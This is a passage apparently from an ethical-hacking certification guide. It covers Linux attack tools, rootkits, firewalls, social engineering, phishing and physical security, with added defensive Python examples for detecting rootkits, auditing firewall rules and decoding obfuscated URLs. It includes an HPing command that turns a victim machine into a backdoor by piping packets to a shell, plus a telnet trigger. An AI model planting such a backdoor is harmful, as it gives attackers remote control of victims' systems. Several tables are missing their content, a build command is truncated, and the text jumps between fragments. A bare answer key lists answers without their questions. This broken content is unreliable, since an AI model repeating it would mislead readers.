mode, which is the preferred mode. The interactive mode of Sniffit allows you to monitor connections
in real time and, therefore, sniff in real time, too. Sniffit isn't maintained anymore and can be unstable.
HPing
HPing (www.hping.org) is a command-line TCP/IP packet assembler/analyzer. We've discussed HPing
before as a ping utility, but HPing also has an often overlooked ability to be used as a backdoor Trojan
horse.
To use HPing as a Trojan, an attacker would enter the following command on the victim's machine:
$ ./hping2 -I eth0 -9 ecc | /bin/sh
This lets the attacker Telnet into any port of the victim's computer and invoke commands remotely by
preceding any Unix/Linux commands with ecc, such as:
$ telnet victim.com 80
$ eccecho This Text imitates a trojan shovel
Linux Rootkits
We've discussed rootkits previously; these are also prevalent in the Linux environment. One way an
intruder can maintain access to a compromised system is by installing a rootkit.
A rootkit contains a set of tools and replacement executables for many of the operating system's
critical components, used to hide evidence of the attacker's presence and to give the attacker
backdoor access to the system. Rootkits require root access to install, but once set up, the attacker
can get root access back at any time. Linux Rootkit v5
(http://packetstormsecurity.org/UNIX/penetration/rootkits/indexsize.html) is the most recent release of
the famous Linux Trojan rootkit, LR.
Rootkit Countermeasure: Chkrootkit
Chkrootkit (www.chkrootkit.org) is a tool to locally check for signs of a rootkit. It contains:
chkrootkit shell script that checks system binaries for rootkit modification.
ifpromisc.c, which checks if the interface is in promiscuous mode
chklastlog.c, which checks for lastlog deletions
chkwtmp.c, which checks for wtmp deletions
check_wtmpx.c, which checks for wtmpx deletions (Solaris only)
chkproc.c, which checks for signs of LKM trojans
chkdirs.c, which checks for signs of LKM trojans
strings.c, a quick and dirty strings replacement
chkutmp.c, which checks for utmp deletions
Chkrootkit detects about 60 of the most common rootkits and has been tested on Linux 2.0.x, 2.2.x,
2.4.x and 2.6.x; FreeBSD 2.2.x, 3.x, 4.x and 5.x; OpenBSD 2.x and 3.x; NetBSD 1.6.x; Solaris 2.5.1,
2.6, 8.0, and 9.0; HP-UX 11; Tru64; BSDI; and Mac OS X.
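Two of the checks the chkrootkit components above perform, comparing system binaries against known-good copies and testing whether an interface is in promiscuous mode, can be illustrated in a few lines. The Python below is an added example written for this page, not chkrootkit's own code: it builds a SHA-256 baseline of stand-in "binaries" in a temporary directory, detects a constructed replacement of one of them, and decodes the interface flags word that Linux exposes under /sys/class/net/<iface>/flags (the IFF_PROMISC bit value 0x100 is the kernel's; the file names and contents are constructed).

```python
import hashlib
import os
import tempfile
from pathlib import Path

IFF_PROMISC = 0x100   # Linux interface flag bit for promiscuous mode


def sha256_file(path):
    """Stream a file through SHA-256 and return its hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(paths):
    """Record trusted digests for the given binaries. Build this on a system
    known to be clean and keep the result off the host it describes."""
    return {str(p): sha256_file(p) for p in paths}


def verify_baseline(baseline):
    """Compare current file contents with the baseline; returns a list of
    (path, status) for every file that is missing or whose digest changed."""
    findings = []
    for path, expected in baseline.items():
        if not os.path.exists(path):
            findings.append((path, "missing"))
        elif sha256_file(path) != expected:
            findings.append((path, "modified"))
    return findings


def is_promiscuous(flags_hex):
    """flags_hex is the text of /sys/class/net/<iface>/flags, e.g. '0x1103'."""
    return bool(int(flags_hex, 16) & IFF_PROMISC)


def interface_is_promiscuous(iface):
    """Read the live flags word for an interface (Linux only)."""
    with open(f"/sys/class/net/{iface}/flags") as fh:
        return is_promiscuous(fh.read().strip())


def demo():
    """Constructed scenario: baseline two stand-in 'binaries', then replace one
    the way a user-land rootkit replaces ps or ls, and re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        ls_bin = Path(tmp) / "ls"
        ps_bin = Path(tmp) / "ps"
        ls_bin.write_bytes(b"#!/bin/sh\necho original ls\n")
        ps_bin.write_bytes(b"#!/bin/sh\necho original ps\n")
        baseline = build_baseline([ls_bin, ps_bin])
        clean = verify_baseline(baseline)              # [] on an untouched system
        ps_bin.write_bytes(b"#!/bin/sh\necho trojaned ps\n")
        return clean, verify_baseline(baseline)        # ([], [('<tmp>/ps', 'modified')])


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
    print("promiscuous (0x1103):", is_promiscuous("0x1103"))
```

The limitation is the one the text's chkproc and chkdirs components exist for: a loadable-kernel-module rootkit can lie to any user-space checker about file contents and interface flags, so a digest baseline is only trustworthy when it is stored off the host and the comparison is run from known-clean boot media or from a separate system that mounts the suspect disk.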
The following example shows how to use the change shell command (chsh). For a hacker to build
this rootkit properly using this example, he must compile only chsh in the chsh directory and use fix
to replace the original with the Trojan version:
$ make
gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -
Linux Firewalls
There are a number of firewall products for the Linux OS. Two popular open-source Linux firewalls are
IPChains and IPTables.
IPChains
IPChains (http://people.netfilter.org/~rusty/ipchains/) is a very general TCP/IP packet filter; it allows
you to ACCEPT, DENY, MASQ, REDIRECT, or RETURN packets.
Chains are the rule sets executed in order; whenever a packet matches a rule, that specific target is
executed. There are three chains that are always defined: input, output, and forward. The input chain
is executed whenever a packet arrives on a network interface. The output chain is executed
whenever a packet is exiting a network interface, and the forward chain is executed whenever a
packet must traverse multiple interfaces.
IPTables
IPTables (www.netfilter.org) is designed to improve and replace IPChains. IPTables has many more
features than IPChains, such as:
The Linux kernel is well integrated with the program for loading IPTables-specific kernel modules
designed for improved speed and reliability.
The firewall keeps track of each connection passing through it and in certain cases will view the
contents of data flows in an attempt to anticipate the next action of certain protocols. This is
called stateful packet inspection and is an important feature in the support of active FTP and
DNS, as well as many other network services.
Packets are filtered based on a MAC address and the values of the flags in the TCP header. This
is helpful in preventing attacks using malformed packets and in restricting access from locally
attached servers to other networks regardless of their IP addresses.
System logging provides the option of adjusting the level of detail of the reporting.
There is better network address translation.
There is support for transparent integration with such Web proxy programs as Squid.
A rate limiting feature helps IPTables block some types of DoS attacks.
Considered a faster and more secure alternative to IPChains, IPTables has become the default
firewall package installed under RedHat and Fedora Linux.
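The stateful-inspection, rate-limiting and logging features listed above only help if the rule set actually uses them, so auditing a saved rule set for those properties is a useful check. The Python below is an added example written for this page, not code from the CEH Prep Guide or from the netfilter project. It holds two constructed rule sets in iptables-save format, an accept-everything one and a hardened one, and an audit function that flags the weak settings the feature list is meant to address. The chain name SYN_FLOOD, the rates and the log prefix are constructed values; the iptables options themselves (-m state --state, -m limit --limit/--limit-burst, --syn, -j LOG --log-prefix) are real.

```python
import shlex

# Constructed rule set 1: default-accept, no connection tracking, no rate
# limiting, no logging. Anything not explicitly handled gets in.
WEAK_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp --dport 22 -j ACCEPT
COMMIT
"""

# Constructed rule set 2: default-drop, stateful accept of reply traffic,
# a SYN rate-limit chain (the text's "rate limiting feature" against DoS),
# and logging of what is finally dropped.
HARDENED_RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:SYN_FLOOD - [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --syn -j SYN_FLOOD
-A SYN_FLOOD -m limit --limit 25/second --limit-burst 50 -j RETURN
-A SYN_FLOOD -j DROP
-A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT
-A INPUT -j LOG --log-prefix "iptables-dropped: " --log-level 4
-A INPUT -j DROP
COMMIT
"""


def parse_rules(text):
    """Parse iptables-save text into (policies, rules): chain -> policy, and
    a list of token lists for every -A line in the order they were written."""
    policies, rules = {}, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A "):
            rules.append(shlex.split(line))
    return policies, rules


def has_tokens(rule, *needles):
    return all(n in rule for n in needles)


def stateful_accept(rules):
    """True if some rule accepts ESTABLISHED (reply) traffic via the state or
    conntrack match, which is what makes the firewall stateful."""
    for r in rules:
        for opt in ("--state", "--ctstate"):
            if opt in r and r.index(opt) + 1 < len(r):
                if "ESTABLISHED" in r[r.index(opt) + 1] and r[-1] == "ACCEPT":
                    return True
    return False


def syn_rate_limited(rules):
    """True if a rule matching TCP SYN carries -m limit itself or jumps to a
    user chain that applies -m limit."""
    limited_chains = {r[1] for r in rules if has_tokens(r, "-m", "limit")}
    for r in rules:
        if "--syn" in r:
            if has_tokens(r, "-m", "limit"):
                return True
            if "-j" in r and r[r.index("-j") + 1] in limited_chains:
                return True
    return False


def audit_filter_table(text):
    """Return the list of weaknesses found; an empty list means none of the
    audited properties is missing."""
    policies, rules = parse_rules(text)
    input_rules = [r for r in rules if r[1] == "INPUT"]
    findings = []
    ends_in_drop = bool(input_rules) and input_rules[-1][-1] in ("DROP", "REJECT")
    if policies.get("INPUT") != "DROP" and not ends_in_drop:
        findings.append("INPUT is default-accept with no final DROP/REJECT rule")
    if not stateful_accept(input_rules):
        findings.append("no stateful ESTABLISHED,RELATED accept rule on INPUT")
    if not syn_rate_limited(rules):
        findings.append("TCP SYN packets are not rate limited (-m limit)")
    if not any(has_tokens(r, "-j", "LOG") for r in rules):
        findings.append("dropped traffic is not logged (-j LOG)")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(name + ":", audit_filter_table(text) or "no findings")
```

On a live system the input would be the output of iptables-save. The audit is structural, so rule order still has to be checked by eye: the ESTABLISHED,RELATED accept must come before the SYN handling, and the LOG rule must sit immediately before the final DROP, as in the hardened set, or dropped traffic is logged for some rules and not others.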
StackGuard has been a very popular compiler that has helped to harden programs against stack
smashing attacks. Programs that have been compiled with StackGuard are largely immune to stack
smashing. Unfortunately, as of this writing, the organization distributing StackGuard, immunix.org,
is no more. It's assumed that the program will eventually return in another form.
Snort (www.snort.org). This is a flexible packet sniffer/logger that detects attacks. Snort is an
open source network intrusion prevention and detection system utilizing a rule-driven language,
which combines the benefits of signature-, protocol-, and anomaly-based inspection methods.
Snort is a very commonly deployed intrusion detection and prevention tool.
Stunnel (www.stunnel.org). Stunnel is a universal SSL wrapper that allows you to encrypt
arbitrary TCP connections inside Secure Sockets Layer (SSL) and is available on both Unix and
Windows. Stunnel can allow you to secure non-SSL-aware daemons and protocols (like POP,
IMAP, NNTP, LDAP, and so on) by having Stunnel provide the encryption, requiring no changes
to the daemons' code.
MRTG (www.mrtg.org). The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic
load on network links.
The programs in the following list log the client hostname of incoming Telnet, FTP, rsh, rlogin, finger,
and other requests:
Ntop (www.ntop.org/download.html). Ntop is a Unix/Linux tool that shows the network usage,
similar to what the popular top Unix/Linux command does. Ntop is based on libpcap, and it has
been written in a portable way in order to run on every Unix platform and on Win32 as well.
and port scan detection functionality. The portscan detector is an option that can be chosen at
compile time. The portscan detector simply logs the offending IP address via syslog.
Assessment Questions
The answers to these questions can be found in Appendix A.
1. Answer: b
2. Answer: c
3. Answer: a
4. Answer: c
5. Answer: a
6. Answer: b
7. Answer: a
8. Answer: b
9. Answer: c
10. Answer: d
11. Answer: c
12. Answer: a
13. Answer: d
14. Answer: b
15. Answer: d
16. Answer: d
Social Engineering
Social engineering involves obtaining protected information from individuals by establishing
relationships with them and manipulating them. The information obtained can be passwords, personal
information, account information, PINs, and other data that a hacker can use to mount attacks and
access critical information system resources.
The two principal forms of social engineering are human-based (person-to-person) and computer-based. In human-based, or person-to-person, social engineering, the attacker interacts on a
personal level with the target individual to extract sensitive information. The exchange could be in
person or over the telephone. The computer-based approach relies on software in some form, such
as email, to acquire sensitive data.
In person. The attacker gathers information in person on the premises of an organization. Two
examples of an in-person exploit are:
Important user posing. The attacker pretends to be an individual in a position of authority and
uses that pretense to intimidate people into providing information for fear of offending the
important person.
Technical support or help desk. The attacker poses as a technical support person for an
organization and requests passwords and other sensitive information from a trusting employee by
telephone or in person. For example, telephone requests to persons at their desks might state
that the organization's network is going to be shut down for testing and passwords have to be
changed. The technical support impersonator might then request the unsuspecting user's
password in order to make sure that the user will be able to get back online rapidly when the
system test is over.
Authorization by a third party. The attacker convinces an unsuspecting individual that he or she
is authorized by a third party in a position of authority to receive sensitive information from the
individual.
Mail / IM attachments. Email and IM attachments, when opened by an unsuspecting user, can
install malware such as Trojan horses and viruses on the user's computer.
Pop-up windows. Pop-up windows can simulate an urgent condition on a user's computer and
request sensitive information to restore the computer to normal operation.
Spam mail. Spam email can initiate fraud by a variety of means such as billing or payment
requests, requests for Social Security numbers, and queries for other personal information.
Websites. Fake Websites that appear legitimate and are supposedly pages from reputable
institutions can request information such as passwords for financial institutions, Social Security
numbers, and other sensitive data.
victim should go to the credit rating company's site (URL provided) and log in to check if the activity is
fraudulent. The website at the URL is a fake site set up by the social engineer to look like a valid site.
The login requests the victim's user ID, birth date, Social Security number, and PIN. The attacker thus
obtains information useful in identity theft.
An attacker, helping a friend set up his or her computer at home so that the friend can access files at
his or her place of employment and work at home on weekends, asks the friend for the company modem
phone number, the password for network access, and the password for the friend's computer. With this
information, the attacker can later gain full access to the company's network.
Phishing
Phishing is the process of obtaining sensitive personal data, usually financially related information,
under false pretenses from unsuspecting individuals for fraudulent purposes. Typically, bank account
numbers, PINs, and Social Security numbers are targets of phishing. The term phishing is derived
from the combination of the word phreaking, which refers to telephone network hackers, and fishing,
as in fishing for data. Phishing is a particularly attractive approach to hackers and criminals because
many people use the Internet for banking and other financial transactions. The associated accounts
are vulnerable to phishing attacks.
Phishing messages and Web hosting can be based on servers whose organizations tolerate phishing
activity, on computers that have been compromised by hackers, and on servers of reputable Web
hosting organizations that are unaware of the activity. The latter organizations will usually shut down
the phishing website when they become aware of the phishing activity.
In a typical phishing attack, the hacker will send a fraudulent email message with fake headers stating
the email is from a bank. The message will further ask for a confirmation of the victim's bank account
user ID and password for some fictional reason. The email will usually provide a link to a web server
that generates a window that looks like the bank's Web site and has fields in which the victim is asked
to enter his or her ID and password.
Netcraft, an English Internet Services company, has developed an anti-phishing toolbar to counter the
phishing threat. The Netcraft anti-phishing technology employs the toolbar as a user interface and
central servers that contain a database of information provided by users and Netcraft about websites
and URLs on the Internet. The central database is a repository of data about each site visited by a
user. The information includes the hosting country and location, how long the website has been in
place, and frequency of use by others. In this way, the Netcraft community keeps watch and informs
others of fraudulent Web sites and URLs that are used in phishing attacks. For example, if a user
reports a URL as a phishing site, that site is blocked to other members of the Netcraft toolbar
community.
Hidden Frames
Hidden frames are a means to maintain the state of a website without using cookies to store session
variables. Visible frames hold information and associated hidden frames store data until they are
required.
An attacker can define two frames in HTML code. The primary frame holds the URL data for a valid
site, while the hidden frame contains the running attack code. The legitimate frame occupies 100
percent of the browser interface and, consequently, the hidden frame consumes 0 percent of the
browser interface.
The hidden frame serves as a means to present a false Web page and acquire sensitive information
such as IDs and passwords.
URL Obfuscation
Hackers phishing with fake websites sometimes use techniques to obscure the fake site's URL. Public
domain registration records can be obtained that show the owners of domain names. Thus, an
attacker faces the possibility of being traced to a phishing domain. The Internet service provider can
also be notified by phishing victims and can trace an attacker through the use of a non-obscured URL.
There are a number of ways to obscure URLs, including the following:
Representing characters in the URL in hexadecimal (%xx-escaped) format
Expressing the domain name as an IP address written in a non-standard format, such as
hexadecimal, octal, or double word (dword)
Adding irrelevant text after http:// and before the @ symbol
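Each of the three obfuscation techniques listed above can be undone mechanically, which is what a mail gateway or browser toolbar does before comparing a link against a blocklist. The Python below is an added example written for this page, not Netcraft's or any vendor's code. It decodes percent-escaped characters, ignores the text before @ by taking the real host from the URL's authority component, and converts dword, hexadecimal and octal IP spellings to dotted decimal using the same rules as the C library's inet_aton (the last component fills the remaining bytes). The sample URLs and the private address 192.168.0.1 are constructed.

```python
import ipaddress
from urllib.parse import unquote, urlsplit


def decode_numeric_host(host):
    """Return the dotted-decimal form of a host written as a dword, hex, octal
    or mixed IPv4 literal (inet_aton rules: the last component fills the
    remaining bytes), or None if the host is not a numeric literal."""
    parts = host.split(".")
    if not parts or not all(parts) or len(parts) > 4:
        return None
    values = []
    for part in parts:
        p = part.lower()
        try:
            if p.startswith("0x"):
                values.append(int(p, 16))
            elif len(p) > 1 and p.startswith("0") and p.isdigit():
                values.append(int(p, 8))
            elif p.isdigit():
                values.append(int(p, 10))
            else:
                return None
        except ValueError:
            return None
    *leading, last = values
    if any(v > 255 for v in leading):
        return None
    remaining = 4 - len(leading)
    if last >= 1 << (8 * remaining):
        return None
    number = 0
    for v in leading:
        number = (number << 8) | v
    number = (number << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(number))


def analyse_url(url):
    """Flag the obfuscation patterns from the text and report the host the
    browser would actually contact."""
    findings = []
    parts = urlsplit(url)
    if "@" in parts.netloc:
        findings.append("text-before-@")          # everything before @ is ignored userinfo
    if "%" in url:
        findings.append("percent-encoded")
    host = parts.hostname or ""
    dotted = decode_numeric_host(host)
    if dotted is not None and dotted != host:
        findings.append("numeric-host-obfuscated")
    return {
        "effective_host": dotted or host,
        "decoded_url": unquote(url),
        "findings": findings,
    }


if __name__ == "__main__":
    # Constructed samples of the three techniques, plus a plain URL for contrast.
    for sample in (
        "http://www.bank.example@0xC0A80001/login",
        "http://3232235521/",
        "http://0300.0250.0.01/",
        "http://www.example.com/%6C%6F%67%69%6E",
        "https://www.example.com/",
    ):
        print(sample, "->", analyse_url(sample))
```

The effective_host value is what should be compared against a blocklist or shown to the user; the surface string of the link is meaningless once these transformations are applied. Modern browsers display the decoded host in the address bar for exactly this reason, and many refuse or warn on the userinfo@host form.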
There are tools available to create image maps. Some of these tools are Mapedit and Dreamweaver
by Macromedia.
Identity Theft
Identity theft is stealing another person's personal information and using that information to assume
the person's identity. Once the attacker has the ability to impersonate another individual, he or she
can commit credit card fraud, mail fraud, or other financial transactions in the name of the victim.
Attackers can obtain personal information in the following ways:
Phishing through phone calls, emails, and fake websites
Stealing personal information from financial institutions
Dumpster diving
Stealing a person's mail
Stealing credit card numbers from data storage
Stealing a wallet or purse
Once an attacker has an individual's personal information, he or she can open credit card accounts in
the name of the victim, obtain a loan from a bank, open checking accounts for writing bad checks in the
victim's name, or obtain a driver's license in the victim's name. Some warning signals of identity theft
include the following:
Unauthorized or unknown long-distance calls on a victim's telephone bill
Unknown checks showing up on the victim's checking account statements
Phone calls from collection agencies concerning unpaid bills
Denial of credit when applying for new accounts
Victims of identity theft should contact the U.S. Federal Trade Commission at their hotline: 1-877-IDTHEFT (438-4338).
Background checks
Exit interviews
Upon termination, removing the employees network access
Upon termination, making sure the employee turns in all company property
Non-disclosure agreements (NDAs)
Additional personnel and human resource practices
Physical security procedures
Privacy issues
Processing and enforcing violations
Protecting against viruses, Trojan horses, and worms
Responding to social engineering incidents
Restricting/prohibiting modems on an organization's network
Sensitive but Unclassified (SBU). Information designated as a minor secret but might
not create serious damage if disclosed.
Secret. The unauthorized disclosure of this information could cause serious damage to
the country's national security.
Top Secret. The unauthorized disclosure of top secret information will cause
exceptionally grave damage to the country's national security.
Typical private sector classification definitions:
Sensitive. Information that requires a higher level of classification than normal data.
Principles of confidentiality and integrity are enforced.
Private. Personal information that is intended for use within the organization.
Disclosure could adversely impact the organization and its employees.
Confidential. The most sensitive business information that is intended strictly for use
within the organization. Unauthorized disclosure could seriously impact the
organization and its stockholders.
Social engineering physical security. Physical security measures also play a role in preventing
and identifying social engineering attacks. Some physical security practices that are effective
against social engineering are:
Verify the identities of individuals entering the facilities.
Secure sensitive documents in locked cabinets.
Label sensitive documents prominently.
Do not leave documents in open view.
Shred all discarded paper documents.
Erase all magnetic bulk media.
Encrypt all hard drives.
Secure PBX systems, and cover their use by policy, such as limiting transfers to make long-distance calls.
Physical Security
Physical security is a necessary component in the array of countermeasures to hacking. Physical
security is concerned with a variety of elements, such as physical access to facilities; environmental
issues including power sources, biometrics, natural disasters, equipment, fire protection, inventory
control; and media erasure and destruction. Physical security compromises can affect the
confidentiality, integrity, and availability of information systems through events such as physical loss of
equipment, damage to equipment, disruptions in service, and loss of data. Typical threats to physical
security include:
Human actions such as war, labor strikes, sabotage, theft, and vandalism
Natural events such as thunderstorms, hurricanes, tidal waves, snow storms, earthquakes, and
tornadoes
Disasters such as release of toxic gases, fires, loss of heat, loss of electrical power, loss of air
conditioning, equipment failure, and water damage
In evaluating failure of various types of equipment, two metrics are useful. The first is the Mean Time
Between Failure (MTBF), and the second is the Mean Time to Repair (MTTR). MTBF is the estimated
mean time that the piece of equipment will remain operational before it needs to be repaired or
replaced. The MTTR is the estimated mean time required to repair a piece of equipment and place it
back in service.
remodeling older space. Construction issues that have to be taken into account are heights and fire
ratings of walls and ceilings, weight ratings and electrical conductivity of floors (to reduce static
buildup) and possible raised flooring. Additional considerations are window security, doors and
emergency exits, sprinkler systems, accessibility of shutoff switches and valves, proper air
conditioning, positive air pressure to protect against toxins entering the building, and proper electrical
design and backup power sources.
In selecting a new site for a data facility, a number of different areas have to be considered, as listed
in Table 12-1.
Table 12-1: Site Selection Considerations
ITEM                  CONSIDERATIONS
Local environment
Joint tenancy
Visibility
Transportation
Emergency services
Another aspect of facility control is an access log of events associated with entering the facility. The
log should generate the following information:
Security violations
Modification of access privileges and by whom
Time and date of access attempts
Successful and unsuccessful access attempts
Point of entry associated with each access attempt
Name of individual(s) attempting access
Facility controls should also address emergency and related procedures such as training, evacuation
drills, shutdown methods, and equipment testing.
Environmental Controls
Environmental controls deal with the electrical power and heating, ventilation, and air conditioning
(HVAC).
Computer equipment requires clean, uninterrupted power. Electrical power is subject to a variety of
anomalies, as summarized in Table 12-2.
Table 12-2
ANOMALY               DESCRIPTION
Blackout
Brownout
Fault
Inrush
Noise                 Undesired interference
Sag
Spike
Surge
Transient
Noise voltages on power lines can be eliminated or reduced by grounding the equipment properly,
shielding the cables, and minimizing exposure to noise sources such as motors and fluorescent lights.
Surge suppressors are useful in protecting equipment against power surges and voltage spikes, such
as those resulting from lightning strikes.
Controlling humidity is also important relative to electrical systems. A very low-humidity environment
can result in static discharges that can damage and destroy semiconductor devices. Conversely, high
humidity can cause corrosion and short circuits in electrical circuits. Humidity should be between 40
and 60 percent. Static-free carpeting should also be used around computer equipment.
Fire Suppression
Combustible materials are categorized into ratings classes that determine the type of agent that
should be used to extinguish a fire burning those materials. These classes and associated
suppression agents are summarized in Table 12-3.
DESCRIPTION            EXTINGUISHING AGENTS
Common combustibles
Liquid
Electrical             CO2 or Halon
Water, soda acid, carbon dioxide, and Halon are the primary suppression agents for fires. These
extinguishing agents have different characteristics that are applicable to suppress different types of
fires. Carbon dioxide is used in gas-based fire extinguishing systems and displaces the oxygen
necessary to sustain a fire. CO2 is colorless and odorless and, because it removes oxygen from its
environment, it is dangerous to personnel. Therefore, when CO2 is used, alarms must sound to allow
personnel to exit the facility or disable the CO2 discharge.
Soda acid is used primarily in portable fire extinguishers and comprises sodium bicarbonate and
water that also generate CO2 to suppress fires.
Halon has almost ideal characteristics for suppressing fires around electrical and computer
equipment, but has been found dangerous to personnel because at high temperatures it decomposes
into the toxic chemicals bromine, hydrogen fluoride, and hydrogen bromide. Therefore, as with CO2,
personnel have to be given time to evacuate a facility before the Halon is released. Because of its
toxicity at high temperatures and other characteristics such as being ozone-depleting, the Montreal
Protocol of 1987 banned new Halon 1301 use. Federal regulations prohibit the production of Halon,
and laws regulate its disposal. Halon can be recycled for use in existing facilities, but replacing it with
another system is encouraged.
Halon comes in two main forms: Halon 1211, which is a liquid agent, and Halon 1301, a gas.
Specific materials and their corresponding fire class ratings are given in Table 12-4.
Table 12-4: Fire Class Ratings for Combustible Materials
FIRE CLASS    COMBUSTIBLE MATERIALS
              Flammable liquids and gases, oils, greases, tars, oil-base paints and lacquers
Fire Detection
Fire detection is critical to life safety. Sensing devices are available that respond to heat, flame, or
smoke. Heat-sensing detectors respond to either the rate of change of temperature or the actual
temperature level. Flame-responding detectors sense the flame pulsation or the flame's infrared
emissions. Smoke detectors incorporate either photoelectric sensors that respond to smoke
interference or radiation-based sensors that detect when smoke interferes with the ionization current.
In addition to devices that sense fires, devices that extinguish fires must also be installed to protect
personnel and equipment. The two most common types of fire extinguishers are water sprinkler
systems and gas discharge systems. The water sprinkler systems operate in four different ways:
Wet pipe. A wet pipe sprinkler system uses a fusible link in the water outlet nozzle. The link is
sensitive to heat and melts when it reaches a temperature of 165°F, releasing water through a
gate valve. Because the water runs to the nozzle, a malfunction can cause a water flood on
sensitive equipment. This type of sprinkler is also known as a closed head system.
Dry pipe. In the dry pipe system, water is not at the sprinkler head, but is held back by a clapper
valve at a distance from the head. When a fire occurs, the clapper valve activates and opens,
releasing the water. The water travels the distance to the head and is released. The dry pipe
system is better suited for computer installations than the wet pipe system because it provides
time to turn off electronic equipment before the water is released.
Deluge. A deluge system is similar to a dry pipe system but releases a much larger amount of
water in the same amount of time.
Preaction. A preaction system incorporates both the wet pipe and dry pipe methods. The water is
held back by a valve as in a dry pipe system, but there is also a fusible link in the sprinkler head
that melts when a fire occurs. In operation, the water is released by the dry pipe valve, travels to
the sprinkler head, and is discharged from the sprinkler head when the fusible link melts.
Preaction is recommended for use in areas with computers and electronic equipment because
the delay allows the equipment to be deactivated before the water flows.
Fires and fire extinguishers can generate harmful environments and contaminants such as high
temperatures, smoke particles, water, and residue from Halon or CO2. These are harmful to both
equipment and people. For example, temperatures above 100°F can damage magnetic storage
media and above 175°F can be harmful to computer equipment.
Access Controls
Access control applies to both physical and data entities. In the physical realm, access controls are
employed in facilities and areas where computational resources reside.
Access Cards
A security access card is a common device that limits access to a building or facility. A dumb security
card has a person's picture, and it is inspected by a guard, whereas a smart card has data or digital
intelligence embedded inside. The smart card is read by an access control computer, which can
record the identity of the individual, time and date of access, and so on. Some smart cards might
require the entry of a PIN such as is used with a bank ATM card.
Some access security cards can also be read by readers that are in proximity to the card. The card
can be passive and respond when the magnetic field of the reader generates currents in the card or it
can be active with its own power supply.
Table 12-5 summarizes the main types of access cards.
Table 12-5: Access Cards
CARD TYPE            DESCRIPTION
Photo ID             Picture
Magnetic stripe
Passive electronic
Active electronic
Biometric Systems
There are three types of authentication mechanisms, as follows:
Type 1. Something you know, such as a personal identification number (PIN) or password
Type 2. Something you have, such as an ATM card or a smart card
Type 3. Something you are, such as a fingerprint
Two-factor authentication requires two of the three factors to be used in the authentication process.
For example, withdrawing funds from an ATM requires a two-factor authentication in the form of the
ATM card (something you have) and a PIN number (something you know).
Biometrics addresses the Type 3 factor and provides an automated means of identifying and
authenticating a living person based on physiological or behavioral characteristics. Biometrics is used
for identification in physical controls and for authentication in logical controls.
In physical security, biometrics is based on a Type 3 factor, such as a fingerprint. When an individual
presents his or her fingerprint for identification, a one-to-many search of an individual's characteristics
from a database of stored images is conducted. To authenticate an individual, a one-to-one search of
the database is initiated to verify a claim to an identity made by a person.
To rate the performance of biometrics, three characteristics are commonly used:
False Rejection Rate (FRR) or Type I Error. The percentage of valid subjects that are falsely
rejected
False Acceptance Rate (FAR) or Type II Error. The percentage of invalid subjects that are
falsely accepted
Crossover Error Rate (CER). The percent in which the FRR equals the FAR
A graph showing the FRR and FAR as a function of the sensitivity of the detection device is given in
Figure 12-1. The figure illustrates that if the sensitivity of the detection equipment is increased, the
FRR will increase. Conversely, if the sensitivity is decreased, the FAR will increase. The point on the
graph where the two curves intersect is the CER. The lower the value of the CER, the better the
performance of the biometric device.
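The relationship between sensitivity, FRR, FAR and the CER can be reproduced numerically. The script below is an added example, not material from the original chapter: it sweeps an acceptance threshold over constructed match scores for genuine users and impostors, computes FRR and FAR at each threshold, and reports the threshold where the two rates cross. The score lists, the 0 to 100 score scale and the "accept when score is at or above threshold" rule are assumptions for illustration; a real device's scores and thresholds come from its vendor.

```python
"""Added example: computing FRR, FAR and the crossover error rate (CER).

Raising the threshold makes the device more sensitive: more genuine users fall
below it (FRR rises) and fewer impostors clear it (FAR falls). Lowering it does
the opposite. The CER is read off at the threshold where the two rates meet.
"""

# Constructed scores (0..100). Genuine users mostly score high, impostors
# mostly low, but the two populations overlap so the CER is non-zero.
GENUINE = [92, 88, 85, 81, 77, 73, 68, 62, 55, 48]
IMPOSTOR = [64, 58, 53, 50, 47, 44, 40, 35, 30, 22]


def frr(genuine, threshold):
    """False Rejection Rate (Type I): fraction of genuine subjects scoring below the threshold."""
    return sum(1 for s in genuine if s < threshold) / len(genuine)


def far(impostor, threshold):
    """False Acceptance Rate (Type II): fraction of impostors scoring at or above the threshold."""
    return sum(1 for s in impostor if s >= threshold) / len(impostor)


def error_curve(genuine, impostor):
    """Return (threshold, FRR, FAR) for every integer threshold from 0 to 100."""
    return [(t, frr(genuine, t), far(impostor, t)) for t in range(0, 101)]


def crossover(genuine, impostor):
    """Return (threshold, CER) at the point where |FRR - FAR| is smallest.

    Ties are broken toward the lowest threshold so the result is deterministic.
    The CER is reported as the mean of the two rates at that threshold.
    """
    curve = error_curve(genuine, impostor)
    t, r, a = min(curve, key=lambda p: (abs(p[1] - p[2]), p[0]))
    return t, (r + a) / 2


if __name__ == "__main__":
    for t, r, a in error_curve(GENUINE, IMPOSTOR)[40:70:5]:
        print(f"threshold {t:3d}  FRR {r:.1f}  FAR {a:.1f}")
    print("CER at threshold %d: %.2f" % crossover(GENUINE, IMPOSTOR))
```

With the sample scores the curves cross at a threshold of 56, where both rates are 20 percent; a device whose genuine and impostor score distributions overlapped less would show a lower CER, which is what "the lower the CER, the better the device" means in practice.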
Enrollment time. This is the time required to provide acceptable samples of the biometric
characteristic and register with the system. Typical acceptable enrollment times are
approximately two minutes.
Throughput rate. This is the rate at which the system processes and identifies or authenticates
individuals. In working applications, the throughput rate should be approximately 10 subjects per
minute.
Acceptability. This is the measure of how satisfactory and tolerable the biometric system is in
terms of psychological perception, physical comfort, privacy, and invasiveness. For example,
